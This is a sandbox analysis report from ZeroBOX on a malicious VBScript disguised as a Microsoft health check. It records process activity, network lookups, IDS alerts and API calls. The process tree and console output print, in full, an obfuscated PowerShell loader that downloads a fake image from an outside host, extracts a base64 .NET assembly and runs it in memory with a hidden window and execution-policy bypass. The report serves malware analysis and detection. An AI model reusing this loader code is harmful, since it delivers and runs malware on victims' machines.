Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 8, 2023, 9:39 a.m.	Dec. 8, 2023, 9:41 a.m.

Size	132.6KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`61fee3f2dd4255c687072b4eac7cdb0d`
SHA256	`967f3576bbb08cb4c710cb4c66c17061614123cdef74d55705ba1cb91ae03a00`
CRC32	`6946DE71`
ssdeep	`768:eQQHQJQYQJQHQJQHQJQsQJQIQJQ6QJQJQJQ0QJQh2NQB2U:e3wK/KwKwKbKPKJKKKjKhxBn`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\MicrosoftHealthcheck.vbs
416
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'KvHbRIwOvHbRIwOovHbRIwOCcvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOFUvHbRIwOcgBsvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGgvHbRIwOdvHbRIwOB0vHbRIwOHvHbRIwOvHbRIwOcwvHbRIwO6vHbRIwOC8vHbRIwOLwB1vHbRIwOHvHbRIwOvHbRIwObvHbRIwOBvvHbRIwOGEvHbRIwOZvHbRIwOBkvHbRIwOGUvHbRIwOaQvHbRIwOnvHbRIwOCsvHbRIwOJwBtvHbRIwOGEvHbRIwOZwBlvHbRIwOG4vHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOcwvHbRIwOuvHbRIwOGMvHbRIwObwBtvHbRIwOC4vHbRIwOYgByvHbRIwOC8vHbRIwOaQBtvHbRIwOGEvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOZwBlvHbRIwOHMvHbRIwOLwvHbRIwOwvHbRIwODvHbRIwOvHbRIwONvHbRIwOvHbRIwOvvHbRIwODYvHbRIwOOvHbRIwOvHbRIwOzvHbRIwOC8vHbRIwONwvHbRIwO3vHbRIwODkvHbRIwOLwBvvHbRIwOHIvHbRIwOaQBnvHbRIwOGkvHbRIwObgBhvHbRIwOGwvHbRIwOLwBkvHbRIwOG8vHbRIwOdwBuvHbRIwOGwvHbRIwObwBhvHbRIwOGQvHbRIwOLgBqvHbRIwOHvHbRIwOvHbRIwOZwvHbRIwO/vHbRIwODEvHbRIwONwvHbRIwOwvHbRIwODEvHbRIwOOvHbRIwOvHbRIwO3vHbRIwODgvHbRIwOOvHbRIwOvHbRIwO2vHbRIwODQvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOB3vHbRIwOGUvHbRIwOYgBDvHbRIwOGwvHbRIwOaQBlvHbRIwOG4vHbRIwOdvHbRIwOvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBOvHbRIwOGUvHbRIwOdwvHbRIwOtvHbRIwOE8vHbRIwOYgBqvHbRIwOGUvHbRIwOYwB0vHbRIwOCvHbRIwOvHbRIwOUwB5vHbRIwOHMvHbRIwOdvHbRIwOBlvHbRIwOG0vHbRIwOLgBOvHbRIwOGUvHbRIwOdvHbRIwOvHbRIwOuvHbRIwOFcvHbRIwOZQBivHbRIwOEMvHbRIwObvHbRIwOBpvHbRIwOGUvHbRIwObgB0vHbRIwODsvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOEIvHbRIwOeQB0vHbRIwOGUvHbRIwOcwvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOB3vHbRIwOGUvHbRIwOYgBDvHbRIwOGwvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOaQBlvHbRIwOG4vHbRIwOdvHbRIwOvHbRIwOuvHbRIwOEQvHbRIwObwB3vHbRIwOG4vHbRIwObvHbRIwOBvvHbRIwOGEvHbRIwOZvHbRIwOBEvHbRIwOGEvHbRIwOdvHbRIwOBhvHbRIwOCgvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOFUvHbRIwOcgBsvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBpvHbRIwOG0vHbRIwOYQBnvHbRIwOGUvHbRIwOVvHbRIwOBlvHbRIwOHgvHbRIwOdvHbRIwOvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBbvHbRIwOFMvHbRIwOeQvHbRIwOnvHbRIwOCsvHbRIwOJwBzvHbRIwOHQvHbRIwOZQBtvHbRIwOC4vHbRIwOVvHbRIwOBlvHbRIwOHgvHbRIwOdvHbRIwOvHbRIwOuvHbRIwOEUvHbRIwObgBjvHbRIwOG8vHbRIwOZvHbRIwOBpvHbRIwOG4vHbRIwOZwBdvHbRIwODovHbRIwOOgBVvHbRIwOFQvHbRIwORgvHbRIwO4vHbRIwOC4vHbRIwORwBlvHbRIwOHQvHbRIwOUwB0vHbRIwOHIvHbRIwOaQBuvHbRIwOGcvHbRIwOKvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBpvHbRIwOG0vHbRIwOYQBnvHbRIwOGUvHbRIwOQgB5vHbRIwOHQvHbRIwOZQBzvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBzvHbRIwOHQvHbRIwOYQByvHbRIwOHQvHbRIwORgBsvHbRIwOGEvHbRIwOZwvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwO8vHbRIwODwvHbRIwOQgBBvHbRIwOFMvHbRIwORQvHbRIwO2vHbRIwODQvHbRIwOXwBTvHbRIwOFQvHbRIwOQQBSvHbRIwOFQvHbRIwOPgvHbRIwO+vHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwODsvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOZQBuvHbRIwOGQvHbRIwORgBsvHbRIwOCcvHbRIwOKwvHbRIwOnvHbRIwOGEvHbRIwOZwvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwO8vHbRIwODwvHbRIwOQgBBvHbRIwOFMvHbRIwORQvHbRIwO2vHbRIwODQvHbRIwOXwBFvHbRIwOE4vHbRIwORvHbRIwOvHbRIwO+vHbRIwOD4vHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBzvHbRIwOHQvHbRIwOYQByvHbRIwOHQvHbRIwOSQBuvHbRIwOGQvHbRIwOZQB4vHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGkvHbRIwObQBhvHbRIwOGcvHbRIwOZQBUvHbRIwOGUvHbRIwOevHbRIwOB0vHbRIwOC4vHbRIwOSQBuvHbRIwOGQvHbRIwOZQB4vHbRIwOE8vHbRIwOZgvHbRIwOovHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOHMvHbRIwOdvHbRIwOBhvHbRIwOHIvHbRIwOdvHbRIwOBGvHbRIwOGwvHbRIwOYQBnvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBlvHbRIwOG4vHbRIwOZvHbRIwOBJvHbRIwOG4vHbRIwOZvHbRIwOBlvHbRIwOHgvHbRIwOIvHbRIwOvHbRIwO9vHbRIwOCvHbRIwOvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOFQvHbRIwOZQB4vHbRIwOHQvHbRIwOLgBJvHbRIwOG4vHbRIwOZvHbRIwOBlvHbRIwOHgvHbRIwOTwBmvHbRIwOCgvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOZQBuvHbRIwOGQvHbRIwORgvHbRIwOnvHbRIwOCsvHbRIwOJwBsvHbRIwOGEvHbRIwOZwvHbRIwOpvHbRIwODsvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOcwB0vHbRIwOGEvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOcgB0vHbRIwOEkvHbRIwObgBkvHbRIwOGUvHbRIwOevHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOZwBlvHbRIwOCvHbRIwOvHbRIwOMvHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOYQBuvHbRIwOGQvHbRIwOIvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBlvHbRIwOG4vHbRIwOZvHbRIwOBJvHbRIwOG4vHbRIwOZvHbRIwOBlvHbRIwOHgvHbRIwOIvHbRIwOvHbRIwOtvHbRIwOGcvHbRIwOdvHbRIwOvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOHMvHbRIwOdvHbRIwOBhvHbRIwOHIvHbRIwOdvHbRIwOBJvHbRIwOG4vHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOZvHbRIwOBlvHbRIwOHgvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBzvHbRIwOHQvHbRIwOYQByvHbRIwOHQvHbRIwOSQBuvHbRIwOGQvHbRIwOZQB4vHbRIwOCvHbRIwOvHbRIwOKwvHbRIwO9vHbRIwOCvHbRIwOvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOcwB0vHbRIwOGEvHbRIwOcgB0vHbRIwOEYvHbRIwObvHbRIwOBhvHbRIwOGcvHbRIwOLgBMvHbRIwOGUvHbRIwObgBnvHbRIwOHQvHbRIwOavHbRIwOvHbRIwO7vHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGIvHbRIwOYQBzvHbRIwOGUvHbRIwONgvHbRIwO0vHbRIwOEwvHbRIwOZQBuvHbRIwOGcvHbRIwOdvHbRIwOBovHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGUvHbRIwObgBkvHbRIwOEkvHbRIwObgBkvHbRIwOGUvHbRIwOevHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOIvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBzvHbRIwOHQvHbRIwOYQByvHbRIwOHQvHbRIwOSQBuvHbRIwOGQvHbRIwOZQB4vHbRIwODsvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOYgBhvHbRIwOHMvHbRIwOZQvHbRIwO2vHbRIwODQvHbRIwOQwBvvHbRIwOG0vHbRIwObQBhvHbRIwOG4vHbRIwOZvHbRIwOvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBpvHbRIwOG0vHbRIwOYQBnvHbRIwOGUvHbRIwOVvHbRIwOBlvHbRIwOHgvHbRIwOdvHbRIwOvHbRIwOuvHbRIwOFMvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOdQBivHbRIwOHMvHbRIwOdvHbRIwOByvHbRIwOGkvHbRIwObgBnvHbRIwOCgvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOcwB0vHbRIwOGEvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOcgB0vHbRIwOEkvHbRIwObgBkvHbRIwOGUvHbRIwOevHbRIwOvHbRIwOsvHbRIwOCvHbRIwOvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOYgBhvHbRIwOHMvHbRIwOZQvHbRIwO2vHbRIwODQvHbRIwOTvHbRIwOBlvHbRIwOG4vHbRIwOZwB0vHbRIwOGgvHbRIwOKQvHbRIwO7vHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGMvHbRIwObwvHbRIwOnvHbRIwOCsvHbRIwOJwBtvHbRIwOG0vHbRIwOYQBuvHbRIwOGQvHbRIwOQgB5vHbRIwOHQvHbRIwOZQBzvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOFsvHbRIwOUwB5vHbRIwOHMvHbRIwOdvHbRIwOBlvHbRIwOG0vHbRIwOLgBDvHbRIwOG8vHbRIwObgB2vHbRIwOGUvHbRIwOcgB0vHbRIwOF0vHbRIwOOgvHbRIwO6vHbRIwOEYvHbRIwOcgBvvHbRIwOG0vHbRIwOQgBhvHbRIwOHMvHbRIwOZQvHbRIwO2vHbRIwODQvHbRIwOUwB0vHbRIwOHIvHbRIwOaQBuvHbRIwOGcvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOKvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBivHbRIwOGEvHbRIwOcwBlvHbRIwODYvHbRIwONvHbRIwOBDvHbRIwOG8vHbRIwObQBtvHbRIwOGEvHbRIwObgBkvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBsvHbRIwOG8vHbRIwOYQBkvHbRIwOGUvHbRIwOZvHbRIwOBBvHbRIwOHMvHbRIwOcwBlvHbRIwOG0vHbRIwOYgBsvHbRIwOHkvHbRIwOIvHbRIwOvHbRIwO9vHbRIwOCvHbRIwOvHbRIwOWwBTvHbRIwOHkvHbRIwOcwB0vHbRIwOCcvHbRIwOKwvHbRIwOnvHbRIwOGUvHbRIwObQvHbRIwOuvHbRIwOFIvHbRIwOZQBmvHbRIwOGwvHbRIwOZQBjvHbRIwOHQvHbRIwOaQBvvHbRIwOG4vHbRIwOLgBBvHbRIwOHMvHbRIwOcwBlvHbRIwOG0vHbRIwOYgBsvHbRIwOHkvHbRIwOXQvHbRIwO6vHbRIwODovHbRIwOTvHbRIwOBvvHbRIwOGEvHbRIwOZvHbRIwOvHbRIwOovHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGMvHbRIwObwBtvHbRIwOG0vHbRIwOYQBuvHbRIwOGQvHbRIwOQgB5vHbRIwOHQvHbRIwOZQBzvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOB0vHbRIwOHkvHbRIwOcvHbRIwOBlvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGwvHbRIwObwBhvHbRIwOGQvHbRIwOZQBkvHbRIwOEEvHbRIwOcwBzvHbRIwOGUvHbRIwObQBivHbRIwOGwvHbRIwOeQvHbRIwOuvHbRIwOEcvHbRIwOZQB0vHbRIwOFQvHbRIwOeQBwvHbRIwOGUvHbRIwOKvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOBDvHbRIwOGwvHbRIwOYQBzvHbRIwOHMvHbRIwOTvHbRIwOvHbRIwOnvHbRIwOCsvHbRIwOJwBpvHbRIwOGIvHbRIwOcgBhvHbRIwOHIvHbRIwOeQvHbRIwOzvHbRIwOC4vHbRIwOQwBsvHbRIwOGEvHbRIwOcwBzvHbRIwODEvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOKQvHbRIwO7vHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOG0vHbRIwOZQB0vHbRIwOGgvHbRIwObwBkvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOHQvHbRIwOeQBwvHbRIwOGUvHbRIwOLgBHvHbRIwOGUvHbRIwOdvHbRIwOBNvHbRIwOGUvHbRIwOdvHbRIwOBovHbRIwOG8vHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOZvHbRIwOvHbRIwOovHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOFIvHbRIwOdQBuvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCkvHbRIwOLgBJvHbRIwOG4vHbRIwOdgBvvHbRIwOGsvHbRIwOZQvHbRIwOovHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOG4vHbRIwOdQBsvHbRIwOGwvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOFsvHbRIwObwBivHbRIwOGovHbRIwOZQBjvHbRIwOHQvHbRIwOWwBdvHbRIwOF0vHbRIwOIvHbRIwOvHbRIwOovHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGQvHbRIwOSvHbRIwOvHbRIwOnvHbRIwOCsvHbRIwOJwBovHbRIwODvHbRIwOvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOTvHbRIwOBrvHbRIwODEvHbRIwOSvHbRIwOBXvHbRIwOGkvHbRIwOOvHbRIwOB3vHbRIwOE0vHbRIwORvHbRIwOBNvHbRIwOHYvHbRIwOTwBDvHbRIwODQvHbRIwOegBOvHbRIwOEMvHbRIwONvHbRIwOvHbRIwO0vHbRIwOE0vHbRIwOagBJvHbRIwOHUvHbRIwOTgBqvHbRIwOFkvHbRIwOdgBMvHbRIwOHovHbRIwOcvHbRIwOB3vHbRIwOGQvHbRIwOSvHbRIwOBSvHbRIwOG8vHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOIvHbRIwOvHbRIwOsvHbRIwOCvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOIvHbRIwOvHbRIwOsvHbRIwOCvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOMgBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOgvHbRIwOCwvHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOByvHbRIwOGUvHbRIwOZwBhvHbRIwOHMvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwObQBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOgvHbRIwOCwvHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwO2vHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCvHbRIwOvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOEMvHbRIwOOgBtvHbRIwOEsvHbRIwOMwBQvHbRIwOHIvHbRIwObwBnvHbRIwOHIvHbRIwOYQBtvHbRIwOEQvHbRIwOYQB0vHbRIwOGEvHbRIwObQBLvHbRIwODMvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGgvHbRIwOdvHbRIwOBtvHbRIwOGwvHbRIwOagBpvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCkvHbRIwOKQvHbRIwOnvHbRIwOCkvHbRIwOIvHbRIwOvHbRIwOtvHbRIwOHIvHbRIwOZQBQvHbRIwOGwvHbRIwOYQBjvHbRIwOGUvHbRIwOJwBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOnvHbRIwOCwvHbRIwOWwBDvHbRIwOGgvHbRIwOYQByvHbRIwOF0vHbRIwOMwvHbRIwO5vHbRIwOC0vHbRIwOQwBSvHbRIwOGUvHbRIwOUvHbRIwOBsvHbRIwOGEvHbRIwOYwBFvHbRIwOCvHbRIwOvHbRIwOIvHbRIwOvHbRIwOnvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwOzvHbRIwODYvHbRIwOIvHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOcgBlvHbRIwOFvHbRIwOvHbRIwObvHbRIwOBhvHbRIwOGMvHbRIwOZQvHbRIwOnvHbRIwOG0vHbRIwOSwvHbRIwOzvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwO5vHbRIwODIvHbRIwOKQvHbRIwOgvHbRIwOHwvHbRIwOIvHbRIwOvHbRIwOuvHbRIwOCvHbRIwOvHbRIwOKvHbRIwOvHbRIwOgvHbRIwOCQvHbRIwORQBuvHbRIwOFYvHbRIwOOgBDvHbRIwOG8vHbRIwOTQBzvHbRIwOFvHbRIwOvHbRIwOZQBDvHbRIwOFsvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONQBdvHbRIwOC0vHbRIwOagBPvHbRIwOGkvHbRIwOTgvHbRIwOnvHbRIwOCcvHbRIwOKQvHbRIwO=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  2076
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bu0imageUrl = Ok0https://uploaddei'+'magen'+'s.com.br/ima'+'ges/004/683/779/original/download.jpg?1701878864Ok0;bu0webClient = New-Object System.Net.WebClient;bu0imageBytes = bu0webCl'+'ient.DownloadData(bu0imageUrl);bu0imageText = [Sy'+'stem.Text.Encoding]::UTF8.GetString(bu0imageBytes);bu0startFlag = Ok0<<BASE64_START>>Ok0;bu0endFl'+'ag = Ok0<<BASE64_END>>Ok0;bu0startIndex = bu0imageText.IndexOf(bu0startFlag);bu0endIndex = '+'bu0imageText.IndexOf(bu0endF'+'lag);bu0sta'+'rtIndex -ge 0 -and bu0endIndex -gt bu0startIn'+'dex;bu0startIndex += bu0startFlag.Length;bu0base64Length = bu0endIndex - bu0startIndex;bu0base64Command = bu0imageText.S'+'ubstring(bu0sta'+'rtIndex, bu0'+'base64Length);bu0co'+'mmandBytes = [System.Convert]::FromBase64String'+'(bu0base64Command);bu0loadedAssembly = [Syst'+'em.Reflection.Assembly]::Load(bu0commandBytes);bu0type = bu0loadedAssembly.GetType(Ok0ClassL'+'ibrary3.Class1Ok0);bu0method = bu0type.GetMetho'+'d(Ok0RunOk0).Invoke(bu0null, [object[]] (Ok0dH'+'h0'+'Lk1HWi8wMDMvOC4zNC44MjIuNjYvLzpwdHRoOk0 , Ok0Ok0 , Ok02Ok0 , Ok0regas'+'mOk0 , Ok06Ok0 , Ok0C:mK3ProgramDatamK3Ok0, Ok0htmljiOk0))') -rePlace'Ok0',[Char]39-CRePlacE 'bu0',[Char]36 -rePlace'mK3',[Char]92) | . ( $EnV:CoMsPeC[4,24,25]-jOiN'')"
    2200

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 23.67.53.27 A 23.67.53.17 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net	23.32.56.80
uploaddeimagens.com.br	A 104.21.45.138 A 172.67.215.45	104.21.45.138

IP Address	Status	Action
104.21.45.138	Active	Moloch
164.124.101.2	Active	Moloch
23.67.53.27	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 104.21.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49166 104.21.45.138:443	C=US, O=Let's Encrypt, CN=E1	CN=uploaddeimagens.com.br	d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 8, 2023, 9:39 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 8, 2023, 9:39 a.m.			0	0
IsDebuggerPresent Dec. 8, 2023, 9:39 a.m.			0	0

Command line console output was observed (50 out of 140 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: annel." console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: At line:1 char:180 console_handle: 0x00000047	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/683/779/original/downl console_handle: 0x00000053	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: oad.jpg?1701878864';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000005f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::U console_handle: 0x0000006b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: TF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64 console_handle: 0x00000077	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: _END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.Ind console_handle: 0x00000083	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: exOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000008f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $ima console_handle: 0x0000009b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: geText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:: console_handle: 0x000000a7	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly] console_handle: 0x000000b3	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: ::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$ console_handle: 0x000000bf	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0Lk1HWi8wMDMvOC4z console_handle: 0x000000cb	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: NC44MjIuNjYvLzpwdHRo' , '' , '2' , 'regasm' , '6' , 'C:\ProgramData\', 'htmlji' console_handle: 0x000000d7	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000ef	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000fb	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x0000011b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: Parameter name: bytes" console_handle: 0x00000127	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: At line:1 char:243 console_handle: 0x00000133	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/683/779/original/downl console_handle: 0x0000013f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: oad.jpg?1701878864';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000014b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.Ge console_handle: 0x00000157	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: tString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64 console_handle: 0x00000163	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: _END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.Ind console_handle: 0x0000016f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: exOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000017b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $ima console_handle: 0x00000187	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: geText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:: console_handle: 0x00000193	1	1
